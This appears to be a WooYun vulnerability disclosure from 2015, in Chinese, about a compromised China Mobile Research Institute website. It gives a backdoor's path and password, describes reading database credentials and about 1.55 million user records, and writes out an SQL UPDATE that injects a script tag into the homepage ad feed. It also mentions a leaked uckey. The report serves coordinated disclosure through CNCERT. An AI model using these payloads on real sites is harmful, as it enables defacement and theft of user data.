当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142191

漏洞标题:中国移动研究院存在web后门\155W用户数据或泄漏\可通过SQL篡改网站首页

相关厂商:中国移动

漏洞作者: 超威蓝猫

提交时间:2015-09-22 10:06

修复时间:2015-11-08 16:10

公开时间:2015-11-08 16:10

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-24: 厂商已经确认,细节仅向厂商公开
2015-10-04: 细节向核心白帽子及相关领域专家公开
2015-10-14: 细节向普通白帽子公开
2015-10-24: 细节向实习白帽子公开
2015-11-08: 细节向公众公开

简要描述:

详细说明:

中国移动研究院 **.**.**.**

http://**.**.**.**/minetypes_arr.php 密码wooyun


sshot-2015-09-19-[1].png


我们找找数据库连接信息:
/includes/DBConnection.php

sshot-2015-09-19-[2].png


sshot-2015-09-19-[3].png

sshot-2015-09-19-[4].png


155W用户啊,密码是MD5加密

sshot-2015-09-19-[5].png


这些数据应该或多或少都有点价值吧:))

sshot-2015-09-19-[6].png

sshot-2015-09-19-[7].png


sshot-2015-09-19-[8].png


好继续看SQL是如何篡改网站主页的
我们没有/var/www/目录下写文件的权限,因此通过修改php文件来直接篡改是不可行的。

sshot-2015-09-19-[10].png


然而 http://**.**.**.** 首页通过 /ad/show.php?posid=$id 来插入广告

sshot-2015-09-19-[9].png


/ad/show.php?posid=18 返回的内容:

document.write('<a target=\'_blank\' href=\'http://**.**.**.**/ad/hits.php?id=151\'><img src=\'/admin/uploads/UploadImages/20150513/18618_1.E4B880E8B5B7E5AE98E7BD91E59BBE_E589AFE69CAC3.png\' width=\'299\' height=\'137\' /></a>');


我们再看看/ad/show.php的源码:

sshot-2015-09-19-[11].png


这里直接从数据库中读取广告图片的路径并输出,那么只要我们修改数据库中路径的记录 就可以插入js代码。

sshot-2015-09-19-[12].png


update ictspace_ad_list set ad_img='\\\'><img src=\\\'/admin/uploads/UploadImages/20150521/83985_E5AE89E585A8E6B58BE8AF84banner700_84.jpg' where id=172


现在访问http://**.**.**.**/ad/show.php?posid=15:

document.write('<a target=\'_blank\' href=\'http://**.**.**.**/ad/hits.php?id=172\'><img src=\'\'><script src=\'\/upload\/ad.js\'></script><img src=\'/admin/uploads/UploadImages/20150521/83985_E5AE89E585A8E6B58BE8AF84banner700_84.jpg\' width=\'701\' height=\'84\' /></a>');


sshot-2015-09-19-[13].png


成功辣:

sshot-2015-09-19-[14].png


注入js之后想干啥就干啥你懂的(
附送个http://**.**.**.**/ict8的uckey

sshot-2015-09-19-[15].png

漏洞证明:

如上。

修复方案:

._. 高数好难啊

版权声明:转载请注明来源 超威蓝猫@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-24 16:08

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无